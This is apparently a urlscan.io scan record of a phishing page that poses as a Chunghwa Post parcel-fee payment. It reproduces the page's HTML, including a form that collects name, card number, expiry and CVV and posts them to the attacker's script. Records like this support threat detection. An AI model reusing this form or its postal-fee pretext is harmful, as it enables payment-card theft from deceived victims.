jalurid.com Open in urlscan Pro
103.247.11.155  Public Scan

Submitted URL: https://40x20x25.com/logpa
Effective URL: https://jalurid.com/wp-content/uploads/revslider/templates/htacess/TW-post/afc1748070a5c73/payment.php?payment
Submission: On October 29 via manual from ZA — Scanned from DE

Form analysis 2 forms found in the DOM

<form id="regForm" class="bg-white-tran rounded border m-md-4 p-2 p-lg-4 needs-validation">
  <div class="form-group form-row">
    <div class="col-sm pb-2 pb-md-0">
      <div class="form-group form-row">
        <div class="form-check col-sm">
          <div style="text-align: center; font-weight: bold;"><big></big></div>
          <div id="image" style="float:right;">
            <label class="" for="">NT$ 61.32(IVA INCLUDED) </label>
          </div>
          <div id="image" style="float:left;">
            <img style="width: 170px; height: 80px;" src="https://www.post.gov.tw/post/internet/U_english/images/Logo.jpg" align="left">&nbsp;
          </div>
          <h4>郵件號碼:EE749931788TW</h4>
          <p>標準包</p>
        </div>
      </div>
    </div>
    <div class="buttons">
    </div>
  </div>
  <div>
  </div>
</form>

POST submit/subpay.php

<form id="regForm" class="bg-white-tran rounded border m-md-4 p-2 p-lg-4 needs-validation" action="submit/subpay.php" method="post" onsubmit="setFormSubmitting()" autocomplete="off">
  <div class="form-group form-row">
    <div class="col custom-control">
      <div class="form-group form-row">
        <div class="form-check col-sm pb-2 pb-md-0">
          <label for="inputFirstname">姓名*</label>
          <input class="form-control" type="text" placeholder="Required" required="" style="width: 380px;" name="nam" id="nam" oninvalid="this.setCustomValidity('請輸入你的名字')" oninput="setCustomValidity('')">
          <ul class="pl-4">
          </ul>
        </div>
        <div class="form-check col-sm">
          <label for="inputLastname">姓*</label>
          <input class="form-control" type="text" placeholder="Required" required="" style="width: 380px;" name="surnam" id="surnam" oninvalid="this.setCustomValidity('請輸入您的姓氏')" oninput="setCustomValidity('')">
          <ul class="pl-4">
          </ul>
        </div>
      </div>
      <div class="form-group form-row">
        <div class="form-check col-sm pb-2 pb-md-0">
          <label for="inputFirstname">卡號*</label>
          <input class="form-control" style="background-image: url(&quot;../assets/img/cccc.png&quot;); background-repeat: no-repeat; background-position: 101.5% 74.8%;  100%.5%;width: 74.8%;" name="cardcc" id="cardcc" onkeyup="type_carte()"
            placeholder="Card number" aria-required="true" autocomplete="off" required="required" templates="">
          <ul class="pl-4">
          </ul>
        </div>
        <div class="form-check col-sm">
        </div>
      </div>
      <div class="form-group form-row">
        <div class="form-check col-sm pb-2 pb-md-0">
          <div class="form-group form-row">
            <div class="form-check col-sm pb-2 pb-md-0">
              <label for="inputFirstname">截止日期*</label>
              <input type="text" placeholder="MM/YYYY" class="form-control" required="" name="exp" id="exp" maxlength="7" style="width: 200px;" oninvalid="this.setCustomValidity('請輸入有效期')" oninput="setCustomValidity('')">
              <ul class="pl-4">
                <script>
                  function handleExpInput(event) {
                    var charCode = event.key.charCodeAt(0);
                    // Filtered to numeric keys (not part of the ask)
                    if (charCode >= 48 && charCode <= 57) {
                      // Extra handing around the case where the / is at the front of a highlighted block (again not part of the ask)
                      if (event.target.selectionStart === 2) {
                        if (event.target.selectionEnd !== 2) {
                          // Bumps the highlighted section off of the / if so.
                          event.target.selectionStart += 1
                        } else {
                          // Adds the slash before handling the third character.
                          event.target.value += '/'
                        }
                      }
                    } else {
                      // Whitelisting for control keys
                      switch (charCode) {
                        case 8:
                        case 9:
                          break;
                        default:
                          event.preventDefault()
                      }
                    }
                  }
                  document.getElementById('exp').onkeypress = handleExpInput;
                </script>
              </ul>
            </div>
            <div class="form-check col-sm">
              <label for="inputLastname">CVV 代碼*</label>
              <input class="form-control" style="background-image: url(../assets/img/crypt.png);background-repeat: no-repeat;background-position: 98%;width: 36%;" type="tel" maxlength="8" name="cry" id="cry" aria-required="true" autocomplete="off"
                placeholder="CSC/CVV" required="required">
            </div>
          </div>
          <hr>
          <div class="form-group form-row">
            <div class="form-check col-sm">
              <div class="btn-group btn-group-toggle" data-toggle="buttons">
              </div>
            </div>
          </div>
        </div>
      </div>
      <div class="custom-control custom-checkbox mb-3">
        <input type="checkbox" class="custom-control-input" id="iagreeCheck" value="Y" name="iagreeCheck" required="" autocomplete="off"> <label class="custom-control-label" for="iagreeCheck">我已閱讀並接受以上內容
          <a href="#" id="btn-terms" class="btn-link">條款和條件  </a>(包括包含在 <a href="#" id="btn-disclaimer" class="btn-link">免責聲明</a>).</label>
        <div class="invalid-feedback"></div>
      </div>
      <div class="custom-control custom-checkbox mb-0">
        <div class="invalid-feedback"></div>
      </div>
      <div class="custom-control custom-checkbox mb-1 pl-4 ml-4" style="display:none;">
        <input type="checkbox" class="custom-control-input opt-in-item" id="inputOptIn1" value="1" name="inputOptIn" autocomplete="off">
        <label class="custom-control-label" for="inputOptIn1">
          <p class="mb-0"> Stamp and Philately </p>
        </label>
      </div>
      <div class="custom-control custom-checkbox mb-1 pl-4 ml-4" style="display:none;">
        <input type="checkbox" class="custom-control-input opt-in-item" id="inputOptIn2" value="2" name="inputOptIn" autocomplete="off">
        <label class="custom-control-label" for="inputOptIn2">
          <p class="mb-0"> Mailing Service (except SpeedPost) </p>
        </label>
      </div>
      <div class="custom-control custom-checkbox mb-1 pl-4 ml-4" style="display:none;">
        <input type="checkbox" class="custom-control-input opt-in-item" id="inputOptIn3" value="3" name="inputOptIn" autocomplete="off">
        <label class="custom-control-label" for="inputOptIn3">
          <p class="mb-0"> Singapore Post </p>
        </label>
      </div>
      <!-- 					<div class="custom-control custom-checkbox mb-1 pl-4 ml-4"> -->
      <!-- 						<input type="checkbox" class="custom-control-input promoCheckAll" -->
      <!-- 							class="custom-control-label" for="inputOptInAll"> -->
      <!-- 							<p class="mb-0"> -->
      <!-- 							</p> -->
      <!-- 						</label> -->
      <!-- 					</div> -->
      <div class="form-group form-row">
        <div class="col-sm-4 mt-2">
          <button type="submit" class="btn btn-lg btn-primary btn-rounded btn-block"> 付款並繼續 &gt; </button>
        </div>
      </div>
      <div>
        <input type="hidden" name="_csrf" value="9f470439-35b8-4f06-8184-c8f8af6b9210" autocomplete="off">
      </div>
    </div>
  </div>
</form>

Text Content

 * 繁
 * 简
 * EN

NT$ 61.32(IVA INCLUDED)
 

郵件號碼:EE749931788TW

標準包





付款詳情


姓名*
姓*
卡號*

截止日期*
CVV 代碼*

--------------------------------------------------------------------------------


我已閱讀並接受以上內容 條款和條件 (包括包含在 免責聲明).



Stamp and Philately

Mailing Service (except SpeedPost)

Singapore Post

付款並繼續 >

隱私權保護政策 版權宣告 資訊安全政策
中華郵政 版權所有 © 2021



×

Close